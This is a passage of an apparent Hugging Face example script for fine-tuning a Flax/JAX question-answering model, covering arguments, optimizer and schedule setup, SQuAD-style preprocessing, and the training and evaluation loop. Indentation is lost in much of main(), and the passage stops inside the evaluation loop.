from tqdm import tqdm
import jax
import jax.numpy as jnp
import optax
import transformers
from flax import struct, traverse_util
from flax.jax_utils import replicate, unreplicate
from flax.training import train_state
from flax.training.common_utils import get_metrics, onehot, shard
from huggingface_hub import Repository
from transformers import (
AutoConfig,
AutoTokenizer,
EvalPrediction,
FlaxAutoModelForQuestionAnswering,
HfArgumentParser,
PreTrainedTokenizerFast,
is_tensorboard_available,
)
from transformers.file_utils import get_full_repo_name
from transformers.utils import check_min_version
from utils_qa import postprocess_qa_predictions
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.17.0.dev0")
Array = Any
Dataset = datasets.arrow_dataset.Dataset
PRNGKey = Any
# region Arguments
@dataclass
class TrainingArguments:
    """
    Arguments controlling the training loop itself (as opposed to the model or
    data): output location, batch sizes, AdamW hyper-parameters, schedule,
    logging/checkpoint cadence, and Hugging Face Hub upload options.
    """

    output_dir: str = field(
        metadata={"help": "The output directory where the model predictions and checkpoints will be written."},
    )
    overwrite_output_dir: bool = field(
        default=False,
        metadata={
            "help": (
                "Overwrite the content of the output directory. "
                "Use this to continue training if output_dir points to a checkpoint directory."
            )
        },
    )
    do_train: bool = field(default=False, metadata={"help": "Whether to run training."})
    do_eval: bool = field(default=False, metadata={"help": "Whether to run eval on the dev set."})
    do_predict: bool = field(default=False, metadata={"help": "Whether to run predictions on the test set."})
    per_device_train_batch_size: int = field(
        default=8, metadata={"help": "Batch size per GPU/TPU core/CPU for training."}
    )
    per_device_eval_batch_size: int = field(
        default=8, metadata={"help": "Batch size per GPU/TPU core/CPU for evaluation."}
    )
    learning_rate: float = field(default=5e-5, metadata={"help": "The initial learning rate for AdamW."})
    weight_decay: float = field(default=0.0, metadata={"help": "Weight decay for AdamW if we apply some."})
    adam_beta1: float = field(default=0.9, metadata={"help": "Beta1 for AdamW optimizer"})
    adam_beta2: float = field(default=0.999, metadata={"help": "Beta2 for AdamW optimizer"})
    adam_epsilon: float = field(default=1e-8, metadata={"help": "Epsilon for AdamW optimizer."})
    adafactor: bool = field(default=False, metadata={"help": "Whether or not to replace AdamW by Adafactor."})
    num_train_epochs: float = field(default=3.0, metadata={"help": "Total number of training epochs to perform."})
    warmup_steps: int = field(default=0, metadata={"help": "Linear warmup over warmup_steps."})
    logging_steps: int = field(default=500, metadata={"help": "Log every X updates steps."})
    save_steps: int = field(default=500, metadata={"help": "Save checkpoint every X updates steps."})
    eval_steps: int = field(default=None, metadata={"help": "Run an evaluation every X steps."})
    seed: int = field(default=42, metadata={"help": "Random seed that will be set at the beginning of training."})
    push_to_hub: bool = field(
        default=False, metadata={"help": "Whether or not to upload the trained model to the model hub after training."}
    )
    hub_model_id: str = field(
        default=None, metadata={"help": "The name of the repository to keep in sync with the local `output_dir`."}
    )
    hub_token: str = field(default=None, metadata={"help": "The token to use to push to the Model Hub."})

    def __post_init__(self):
        # Normalize a user-supplied '~' so downstream path handling is absolute.
        if self.output_dir is not None:
            self.output_dir = os.path.expanduser(self.output_dir)

    def to_dict(self):
        """
        Serializes this instance while replacing `Enum` members by their values (for JSON serialization support).
        It obfuscates the token values by removing their value.
        """
        d = asdict(self)
        for k, v in d.items():
            if isinstance(v, Enum):
                d[k] = v.value
            if isinstance(v, list) and len(v) > 0 and isinstance(v[0], Enum):
                d[k] = [x.value for x in v]
            # Never leak secrets (e.g. hub_token) into serialized output.
            if k.endswith("_token"):
                d[k] = f"<{k.upper()}>"
        return d
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
    """

    model_name_or_path: str = field(
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
    )
    # config_name / tokenizer_name fall back to model_name_or_path when unset
    # (see the AutoConfig/AutoTokenizer loading code in main()).
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Path to directory to store the pretrained models downloaded from huggingface.co"},
    )
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
            "with private models)."
        },
    )
    dtype: Optional[str] = field(
        default="float32",
        metadata={
            "help": "Floating-point format in which the model weights should be initialized and trained. Choose one of `[float32, float16, bfloat16]`."
        },
    )
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.

    Validation in `__post_init__` requires either a Hub dataset name or at
    least one local csv/json file, raising ValueError otherwise.
    """

    dataset_name: Optional[str] = field(
        default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
    )
    dataset_config_name: Optional[str] = field(
        default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
    )
    train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
    validation_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
    )
    test_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input test data file to evaluate the perplexity on (a text file)."},
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
    )
    preprocessing_num_workers: Optional[int] = field(
        default=None,
        metadata={"help": "The number of processes to use for the preprocessing."},
    )
    max_seq_length: int = field(
        default=384,
        metadata={
            "help": "The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded."
        },
    )
    pad_to_max_length: bool = field(
        default=False,
        metadata={
            "help": "Whether to pad all samples to `max_seq_length`. "
            "If False, will pad the samples dynamically when batching to the maximum length in the batch (which can "
            "be faster on GPU but will be slower on TPU)."
        },
    )
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of training examples to this "
            "value if set."
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
            "value if set."
        },
    )
    max_predict_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of prediction examples to this "
            "value if set."
        },
    )
    version_2_with_negative: bool = field(
        default=False, metadata={"help": "If true, some of the examples do not have an answer."}
    )
    null_score_diff_threshold: float = field(
        default=0.0,
        metadata={
            "help": "The threshold used to select the null answer: if the best answer has a score that is less than "
            "the score of the null answer minus this threshold, the null answer is selected for this example. "
            "Only useful when `version_2_with_negative=True`."
        },
    )
    doc_stride: int = field(
        default=128,
        metadata={"help": "When splitting up a long document into chunks, how much stride to take between chunks."},
    )
    n_best_size: int = field(
        default=20,
        metadata={"help": "The total number of n-best predictions to generate when looking for an answer."},
    )
    max_answer_length: int = field(
        default=30,
        metadata={
            "help": "The maximum length of an answer that can be generated. This is needed because the start "
            "and end predictions are not conditioned on one another."
        },
    )

    def __post_init__(self):
        # Validate that at least one data source exists and that local files use
        # a supported format. Fix: use explicit raises instead of `assert` —
        # asserts are stripped under `python -O`, silently disabling validation.
        # ValueError matches the exception already raised by the first branch.
        if (
            self.dataset_name is None
            and self.train_file is None
            and self.validation_file is None
            and self.test_file is None
        ):
            raise ValueError("Need either a dataset name or a training/validation file/test_file.")
        else:
            if self.train_file is not None:
                extension = self.train_file.split(".")[-1]
                if extension not in ["csv", "json"]:
                    raise ValueError("`train_file` should be a csv or a json file.")
            if self.validation_file is not None:
                extension = self.validation_file.split(".")[-1]
                if extension not in ["csv", "json"]:
                    raise ValueError("`validation_file` should be a csv or a json file.")
            if self.test_file is not None:
                extension = self.test_file.split(".")[-1]
                if extension not in ["csv", "json"]:
                    raise ValueError("`test_file` should be a csv or a json file.")
# endregion
# region Create a train state
def create_train_state(
    model: FlaxAutoModelForQuestionAnswering,
    learning_rate_fn: Callable[[int], float],
    num_labels: int,
    training_args: TrainingArguments,
) -> train_state.TrainState:
    """Create initial training state.

    Builds an AdamW optimizer (with weight decay masked off bias and LayerNorm
    scale parameters) and bundles it with the model's apply function and
    parameters, plus a QA loss that averages start- and end-position
    cross-entropies.

    Args:
        model: The Flax QA model whose params/apply_fn seed the state.
        learning_rate_fn: Step -> learning-rate schedule for AdamW.
        num_labels: Number of token positions (sequence length) used as the
            number of classes for the start/end softmax cross-entropy.
        training_args: Source of the AdamW hyper-parameters.
    """

    class TrainState(train_state.TrainState):
        """Train state with an Optax optimizer.

        The two functions below differ depending on whether the task is classification
        or regression.

        Args:
          logits_fn: Applied to last layer to obtain the logits.
          loss_fn: Function to compute the loss.
        """

        logits_fn: Callable = struct.field(pytree_node=False)
        loss_fn: Callable = struct.field(pytree_node=False)

    # We use Optax's "masking" functionality to not apply weight decay
    # to bias and LayerNorm scale parameters. decay_mask_fn returns a
    # mask boolean with the same structure as the parameters.
    # The mask is True for parameters that should be decayed.
    # Note that this mask is specifically adapted for FlaxBERT-like models.
    # For other models, one should correct the layer norm parameter naming
    # accordingly.
    def decay_mask_fn(params):
        flat_params = traverse_util.flatten_dict(params)
        flat_mask = {path: (path[-1] != "bias" and path[-2:] != ("LayerNorm", "scale")) for path in flat_params}
        return traverse_util.unflatten_dict(flat_mask)

    tx = optax.adamw(
        learning_rate=learning_rate_fn,
        b1=training_args.adam_beta1,
        b2=training_args.adam_beta2,
        eps=training_args.adam_epsilon,
        weight_decay=training_args.weight_decay,
        mask=decay_mask_fn,
    )

    def cross_entropy_loss(logits, labels):
        # logits/labels come as (start, end) pairs; the QA loss is the mean of
        # the two per-position softmax cross-entropies.
        start_loss = optax.softmax_cross_entropy(logits[0], onehot(labels[0], num_classes=num_labels))
        end_loss = optax.softmax_cross_entropy(logits[1], onehot(labels[1], num_classes=num_labels))
        xentropy = (start_loss + end_loss) / 2.0
        return jnp.mean(xentropy)

    return TrainState.create(
        apply_fn=model.__call__,
        params=model.params,
        tx=tx,
        logits_fn=lambda logits: logits,
        loss_fn=cross_entropy_loss,
    )
# endregion
# region Create learning rate function
def create_learning_rate_fn(
    train_ds_size: int, train_batch_size: int, num_train_epochs: int, num_warmup_steps: int, learning_rate: float
) -> Callable[[int], jnp.array]:
    """Returns a linear warmup, linear_decay learning rate function."""
    # Total optimization steps = full batches per epoch * epochs.
    total_steps = (train_ds_size // train_batch_size) * num_train_epochs
    warmup = optax.linear_schedule(init_value=0.0, end_value=learning_rate, transition_steps=num_warmup_steps)
    decay = optax.linear_schedule(
        init_value=learning_rate, end_value=0, transition_steps=total_steps - num_warmup_steps
    )
    # Warm up first, then hand over to the decay schedule at num_warmup_steps.
    return optax.join_schedules(schedules=[warmup, decay], boundaries=[num_warmup_steps])
# endregion
# region train data iterator
def train_data_collator(rng: PRNGKey, dataset: Dataset, batch_size: int):
    """Returns shuffled batches of size `batch_size` from truncated `train dataset`, sharded over all local devices."""
    num_batches = len(dataset) // batch_size
    order = jax.random.permutation(rng, len(dataset))
    # Drop the trailing incomplete batch, then split into per-step index rows.
    order = order[: num_batches * batch_size].reshape((num_batches, batch_size))
    for batch_indices in order:
        examples = dataset[batch_indices]
        examples = {name: np.array(column) for name, column in examples.items()}
        yield shard(examples)
# endregion
# region eval data iterator
def eval_data_collator(dataset: Dataset, batch_size: int):
    """Returns batches of size `batch_size` from `eval dataset`, sharded over all local devices."""
    # Only full batches are yielded; the trailing remainder is dropped.
    last_full = (len(dataset) // batch_size) * batch_size
    for start in range(0, last_full, batch_size):
        examples = dataset[start : start + batch_size]
        examples = {name: np.array(column) for name, column in examples.items()}
        yield shard(examples)
# endregion
def main():
# region Argument parsing
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# endregion
# region Logging
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
# Setup logging, we only want one process per machine to log things on the screen.
logger.setLevel(logging.INFO if jax.process_index() == 0 else logging.ERROR)
if jax.process_index() == 0:
datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
else:
datasets.utils.logging.set_verbosity_error()
transformers.utils.logging.set_verbosity_error()
# endregion
# Handle the repository creation
if training_args.push_to_hub:
if training_args.hub_model_id is None:
repo_name = get_full_repo_name(
Path(training_args.output_dir).absolute().name, token=training_args.hub_token
)
else:
repo_name = training_args.hub_model_id
repo = Repository(training_args.output_dir, clone_from=repo_name)
# region Load Data
# Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
# (the dataset will be downloaded automatically from the datasets Hub).
#
# For CSV/JSON files, this script will use the column called 'text' or the first column if no column called
# 'text' is found. You can easily tweak this behavior (see below).
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if data_args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, cache_dir=model_args.cache_dir
)
else:
# Loading the dataset from local csv or json file.
data_files = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
extension = data_args.train_file.split(".")[-1]
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.validation_file.split(".")[-1]
if data_args.test_file is not None:
data_files["test"] = data_args.test_file
extension = data_args.test_file.split(".")[-1]
raw_datasets = load_dataset(extension, data_files=data_files, field="data", cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# endregion
# region Load pretrained model and tokenizer
#
# Load pretrained model and tokenizer
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
use_fast=True,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# endregion
# region Tokenizer check: this script requires a fast tokenizer.
if not isinstance(tokenizer, PreTrainedTokenizerFast):
raise ValueError(
"This example script only works for models that have a fast tokenizer. Checkout the big table of models "
"at https://huggingface.co/transformers/index.html#supported-frameworks to find the model types that meet this "
"requirement"
)
# endregion
# region Preprocessing the datasets
# Preprocessing is slightly different for training and evaluation.
if training_args.do_train:
column_names = raw_datasets["train"].column_names
elif training_args.do_eval:
column_names = raw_datasets["validation"].column_names
else:
column_names = raw_datasets["test"].column_names
question_column_name = "question" if "question" in column_names else column_names[0]
context_column_name = "context" if "context" in column_names else column_names[1]
answer_column_name = "answers" if "answers" in column_names else column_names[2]
# Padding side determines if we do (question|context) or (context|question).
pad_on_right = tokenizer.padding_side == "right"
if data_args.max_seq_length > tokenizer.model_max_length:
logger.warning(
f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the"
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
# Training preprocessing
    def prepare_train_features(examples):
        """Tokenize a batch of training examples into (possibly several)
        overlapping features and label each feature with start/end token
        positions of the answer, falling back to the CLS index when there is
        no answer or it lies outside the feature's span."""
        # Some of the questions have lots of whitespace on the left, which is not useful and will make the
        # truncation of the context fail (the tokenized question will take a lots of space). So we remove that
        # left whitespace
        examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]

        # Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results
        # in one example possible giving several features when a context is long, each of those features having a
        # context that overlaps a bit the context of the previous feature.
        tokenized_examples = tokenizer(
            examples[question_column_name if pad_on_right else context_column_name],
            examples[context_column_name if pad_on_right else question_column_name],
            truncation="only_second" if pad_on_right else "only_first",
            max_length=max_seq_length,
            stride=data_args.doc_stride,
            return_overflowing_tokens=True,
            return_offsets_mapping=True,
            padding="max_length",
        )

        # Since one example might give us several features if it has a long context, we need a map from a feature to
        # its corresponding example. This key gives us just that.
        sample_mapping = tokenized_examples.pop("overflow_to_sample_mapping")
        # The offset mappings will give us a map from token to character position in the original context. This will
        # help us compute the start_positions and end_positions.
        offset_mapping = tokenized_examples.pop("offset_mapping")

        # Let's label those examples!
        tokenized_examples["start_positions"] = []
        tokenized_examples["end_positions"] = []

        for i, offsets in enumerate(offset_mapping):
            # We will label impossible answers with the index of the CLS token.
            input_ids = tokenized_examples["input_ids"][i]
            cls_index = input_ids.index(tokenizer.cls_token_id)

            # Grab the sequence corresponding to that example (to know what is the context and what is the question).
            sequence_ids = tokenized_examples.sequence_ids(i)

            # One example can give several spans, this is the index of the example containing this span of text.
            sample_index = sample_mapping[i]
            answers = examples[answer_column_name][sample_index]
            # If no answers are given, set the cls_index as answer.
            if len(answers["answer_start"]) == 0:
                tokenized_examples["start_positions"].append(cls_index)
                tokenized_examples["end_positions"].append(cls_index)
            else:
                # Start/end character index of the answer in the text.
                start_char = answers["answer_start"][0]
                end_char = start_char + len(answers["text"][0])

                # Start token index of the current span in the text.
                token_start_index = 0
                while sequence_ids[token_start_index] != (1 if pad_on_right else 0):
                    token_start_index += 1

                # End token index of the current span in the text.
                token_end_index = len(input_ids) - 1
                while sequence_ids[token_end_index] != (1 if pad_on_right else 0):
                    token_end_index -= 1

                # Detect if the answer is out of the span (in which case this feature is labeled with the CLS index).
                if not (offsets[token_start_index][0] <= start_char and offsets[token_end_index][1] >= end_char):
                    tokenized_examples["start_positions"].append(cls_index)
                    tokenized_examples["end_positions"].append(cls_index)
                else:
                    # Otherwise move the token_start_index and token_end_index to the two ends of the answer.
                    # Note: we could go after the last offset if the answer is the last word (edge case).
                    while token_start_index < len(offsets) and offsets[token_start_index][0] <= start_char:
                        token_start_index += 1
                    tokenized_examples["start_positions"].append(token_start_index - 1)
                    while offsets[token_end_index][1] >= end_char:
                        token_end_index -= 1
                    tokenized_examples["end_positions"].append(token_end_index + 1)

        return tokenized_examples
processed_raw_datasets = dict()
if training_args.do_train:
if "train" not in raw_datasets:
raise ValueError("--do_train requires a train dataset")
train_dataset = raw_datasets["train"]
if data_args.max_train_samples is not None:
# We will select sample from whole data if agument is specified
train_dataset = train_dataset.select(range(data_args.max_train_samples))
# Create train feature from dataset
train_dataset = train_dataset.map(
prepare_train_features,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
)
if data_args.max_train_samples is not None:
# Number of samples might increase during Feature Creation, We select only specified max samples
train_dataset = train_dataset.select(range(data_args.max_train_samples))
processed_raw_datasets["train"] = train_dataset
# Validation preprocessing
    def prepare_validation_features(examples):
        """Tokenize a batch of eval examples into overlapping features, record
        the originating example id for each feature, and null out the entries
        of `offset_mapping` that do not belong to the context (so
        post-processing can tell context tokens apart)."""
        # Some of the questions have lots of whitespace on the left, which is not useful and will make the
        # truncation of the context fail (the tokenized question will take a lots of space). So we remove that
        # left whitespace
        examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]

        # Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results
        # in one example possible giving several features when a context is long, each of those features having a
        # context that overlaps a bit the context of the previous feature.
        tokenized_examples = tokenizer(
            examples[question_column_name if pad_on_right else context_column_name],
            examples[context_column_name if pad_on_right else question_column_name],
            truncation="only_second" if pad_on_right else "only_first",
            max_length=max_seq_length,
            stride=data_args.doc_stride,
            return_overflowing_tokens=True,
            return_offsets_mapping=True,
            padding="max_length",
        )

        # Since one example might give us several features if it has a long context, we need a map from a feature to
        # its corresponding example. This key gives us just that.
        sample_mapping = tokenized_examples.pop("overflow_to_sample_mapping")

        # For evaluation, we will need to convert our predictions to substrings of the context, so we keep the
        # corresponding example_id and we will store the offset mappings.
        tokenized_examples["example_id"] = []

        for i in range(len(tokenized_examples["input_ids"])):
            # Grab the sequence corresponding to that example (to know what is the context and what is the question).
            sequence_ids = tokenized_examples.sequence_ids(i)
            context_index = 1 if pad_on_right else 0

            # One example can give several spans, this is the index of the example containing this span of text.
            sample_index = sample_mapping[i]
            tokenized_examples["example_id"].append(examples["id"][sample_index])

            # Set to None the offset_mapping that are not part of the context so it's easy to determine if a token
            # position is part of the context or not.
            tokenized_examples["offset_mapping"][i] = [
                (o if sequence_ids[k] == context_index else None)
                for k, o in enumerate(tokenized_examples["offset_mapping"][i])
            ]

        return tokenized_examples
if training_args.do_eval:
if "validation" not in raw_datasets:
raise ValueError("--do_eval requires a validation dataset")
eval_examples = raw_datasets["validation"]
if data_args.max_eval_samples is not None:
# We will select sample from whole data
eval_examples = eval_examples.select(range(data_args.max_eval_samples))
# Validation Feature Creation
eval_dataset = eval_examples.map(
prepare_validation_features,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
)
if data_args.max_eval_samples is not None:
# During Feature creation dataset samples might increase, we will select required samples again
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
processed_raw_datasets["validation"] = eval_dataset
if training_args.do_predict:
if "test" not in raw_datasets:
raise ValueError("--do_predict requires a test dataset")
predict_examples = raw_datasets["test"]
if data_args.max_predict_samples is not None:
# We will select sample from whole data
predict_examples = predict_examples.select(range(data_args.max_predict_samples))
# Predict Feature Creation
predict_dataset = predict_examples.map(
prepare_validation_features,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
)
if data_args.max_predict_samples is not None:
# During Feature creation dataset samples might increase, we will select required samples again
predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
processed_raw_datasets["test"] = predict_dataset
# endregion
# region Metrics and Post-processing:
def post_processing_function(examples, features, predictions, stage="eval"):
# Post-processing: we match the start logits and end logits to answers in the original context.
predictions = postprocess_qa_predictions(
examples=examples,
features=features,
predictions=predictions,
version_2_with_negative=data_args.version_2_with_negative,
n_best_size=data_args.n_best_size,
max_answer_length=data_args.max_answer_length,
null_score_diff_threshold=data_args.null_score_diff_threshold,
output_dir=training_args.output_dir,
prefix=stage,
)
# Format the result to the format the metric expects.
if data_args.version_2_with_negative:
formatted_predictions = [
{"id": k, "prediction_text": v, "no_answer_probability": 0.0} for k, v in predictions.items()
]
else:
formatted_predictions = [{"id": k, "prediction_text": v} for k, v in predictions.items()]
references = [{"id": ex["id"], "answers": ex[answer_column_name]} for ex in examples]
return EvalPrediction(predictions=formatted_predictions, label_ids=references)
metric = load_metric("squad_v2" if data_args.version_2_with_negative else "squad")
def compute_metrics(p: EvalPrediction):
return metric.compute(predictions=p.predictions, references=p.label_ids)
# Create and fill numpy array of size len_of_validation_data * max_length_of_output_tensor
def create_and_fill_np_array(start_or_end_logits, dataset, max_len):
"""
Create and fill numpy array of size len_of_validation_data * max_length_of_output_tensor
Args:
start_or_end_logits(:obj:`tensor`):
This is the output predictions of the model. We can only enter either start or end logits.
eval_dataset: Evaluation dataset
max_len(:obj:`int`):
The maximum length of the output tensor. ( See the model.eval() part for more details )
"""
step = 0
# create a numpy array and fill it with -100.
logits_concat = np.full((len(dataset), max_len), -100, dtype=np.float64)
# Now since we have create an array now we will populate it with the outputs of the model.
for i, output_logit in enumerate(start_or_end_logits): # populate columns
# We have to fill it such that we have to take the whole tensor and replace it on the newly created array
# And after every iteration we have to change the step
batch_size = output_logit.shape[0]
cols = output_logit.shape[1]
if step + batch_size < len(dataset):
logits_concat[step : step + batch_size, :cols] = output_logit
else:
logits_concat[step:, :cols] = output_logit[: len(dataset) - step]
step += batch_size
return logits_concat
# endregion
# region Training steps and logging init
    train_dataset = processed_raw_datasets["train"]
    eval_dataset = processed_raw_datasets["validation"]
    # Log a few random samples from the training set:
    for index in random.sample(range(len(train_dataset)), 3):
        logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
    # Define a summary writer
    has_tensorboard = is_tensorboard_available()
    # Only the process-0 host writes TensorBoard summaries.
    if has_tensorboard and jax.process_index() == 0:
        try:
            from flax.metrics.tensorboard import SummaryWriter
            summary_writer = SummaryWriter(training_args.output_dir)
            summary_writer.hparams({**training_args.to_dict(), **vars(model_args), **vars(data_args)})
        except ImportError as ie:
            has_tensorboard = False
            logger.warning(
                f"Unable to display metrics through TensorBoard because some package are not installed: {ie}"
            )
    else:
        # NOTE(review): this branch also triggers on non-zero hosts even when
        # tensorboard IS installed, so the message can be misleading there.
        logger.warning(
            "Unable to display metrics through TensorBoard because the package is not installed: "
            "Please run pip install tensorboard to enable."
        )
def write_train_metric(summary_writer, train_metrics, train_time, step):
summary_writer.scalar("train_time", train_time, step)
train_metrics = get_metrics(train_metrics)
for key, vals in train_metrics.items():
tag = f"train_{key}"
for i, val in enumerate(vals):
summary_writer.scalar(tag, val, step - len(vals) + i + 1)
def write_eval_metric(summary_writer, eval_metrics, step):
for metric_name, value in eval_metrics.items():
summary_writer.scalar(f"eval_{metric_name}", value, step)
num_epochs = int(training_args.num_train_epochs)
rng = jax.random.PRNGKey(training_args.seed)
dropout_rngs = jax.random.split(rng, jax.local_device_count())
train_batch_size = training_args.per_device_train_batch_size * jax.local_device_count()
eval_batch_size = training_args.per_device_eval_batch_size * jax.local_device_count()
# endregion
# region Load model
model = FlaxAutoModelForQuestionAnswering.from_pretrained(
model_args.model_name_or_path,
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
seed=training_args.seed,
dtype=getattr(jnp, model_args.dtype),
)
learning_rate_fn = create_learning_rate_fn(
len(train_dataset),
train_batch_size,
training_args.num_train_epochs,
training_args.warmup_steps,
training_args.learning_rate,
)
state = create_train_state(model, learning_rate_fn, num_labels=max_seq_length, training_args=training_args)
# endregion
# region Define train step functions
def train_step(
state: train_state.TrainState, batch: Dict[str, Array], dropout_rng: PRNGKey
) -> Tuple[train_state.TrainState, float]:
"""Trains model with an optimizer (both in `state`) on `batch`, returning a pair `(new_state, loss)`."""
dropout_rng, new_dropout_rng = jax.random.split(dropout_rng)
start_positions = batch.pop("start_positions")
end_positions = batch.pop("end_positions")
targets = (start_positions, end_positions)
def loss_fn(params):
logits = state.apply_fn(**batch, params=params, dropout_rng=dropout_rng, train=True)
loss = state.loss_fn(logits, targets)
return loss
grad_fn = jax.value_and_grad(loss_fn)
loss, grad = grad_fn(state.params)
grad = jax.lax.pmean(grad, "batch")
new_state = state.apply_gradients(grads=grad)
metrics = jax.lax.pmean({"loss": loss, "learning_rate": learning_rate_fn(state.step)}, axis_name="batch")
return new_state, metrics, new_dropout_rng
p_train_step = jax.pmap(train_step, axis_name="batch", donate_argnums=(0,))
# endregion
# region Define eval step functions
def eval_step(state, batch):
logits = state.apply_fn(**batch, params=state.params, train=False)
return state.logits_fn(logits)
p_eval_step = jax.pmap(eval_step, axis_name="batch")
# endregion
    # region Define train and eval loop
    logger.info(f"===== Starting training ({num_epochs} epochs) =====")
    train_time = 0
    # make sure weights are replicated on each device
    state = replicate(state)
    # NOTE(review): duplicate of the assignment three lines above; harmless but redundant.
    train_time = 0
    step_per_epoch = len(train_dataset) // train_batch_size
    total_steps = step_per_epoch * num_epochs
    epochs = tqdm(range(num_epochs), desc=f"Epoch ... (1/{num_epochs})", position=0)
    for epoch in epochs:
        train_start = time.time()
        train_metrics = []
        # Create sampling rng
        rng, input_rng = jax.random.split(rng)
        # train; steps are 1-based so cur_step starts at 1 and logging/eval/save
        # triggers fire on exact multiples of their respective intervals.
        for step, batch in enumerate(
            tqdm(
                train_data_collator(input_rng, train_dataset, train_batch_size),
                total=step_per_epoch,
                desc="Training...",
                position=1,
            ),
            1,
        ):
            state, train_metric, dropout_rngs = p_train_step(state, batch, dropout_rngs)
            train_metrics.append(train_metric)
            cur_step = epoch * step_per_epoch + step
            if cur_step % training_args.logging_steps == 0 and cur_step > 0:
                # Save metrics
                train_metric = unreplicate(train_metric)
                train_time += time.time() - train_start
                if has_tensorboard and jax.process_index() == 0:
                    write_train_metric(summary_writer, train_metrics, train_time, cur_step)
                epochs.write(
                    f"Step... ({cur_step}/{total_steps} | Training Loss: {train_metric['loss']}, Learning Rate: {train_metric['learning_rate']})"
                )
                train_metrics = []
            # Mid-training evaluation: every eval_steps and at each epoch boundary.
            if (
                training_args.do_eval
                and (cur_step % training_args.eval_steps == 0 or cur_step % step_per_epoch == 0)
                and cur_step > 0
            ):
                eval_metrics = {}
                all_start_logits = []
                all_end_logits = []
                # evaluate
                for batch in tqdm(
                    eval_data_collator(eval_dataset, eval_batch_size),
                    total=len(eval_dataset) // eval_batch_size,
                    desc="Evaluating ...",
                    position=2,
                ):
                    # example_id/offset_mapping are post-processing metadata, not model inputs.
                    _ = batch.pop("example_id")
                    _ = batch.pop("offset_mapping")
                    predictions = p_eval_step(state, batch)
                    start_logits = np.array([pred for pred in chain(*predictions[0])])
                    end_logits = np.array([pred for pred in chain(*predictions[1])])
                    all_start_logits.append(start_logits)
                    all_end_logits.append(end_logits)
                # evaluate also on leftover examples (not divisible by batch_size)
                num_leftover_samples = len(eval_dataset) % eval_batch_size
                # make sure leftover batch is evaluated on one device
                if num_leftover_samples > 0 and jax.process_index() == 0:
                    # take leftover samples
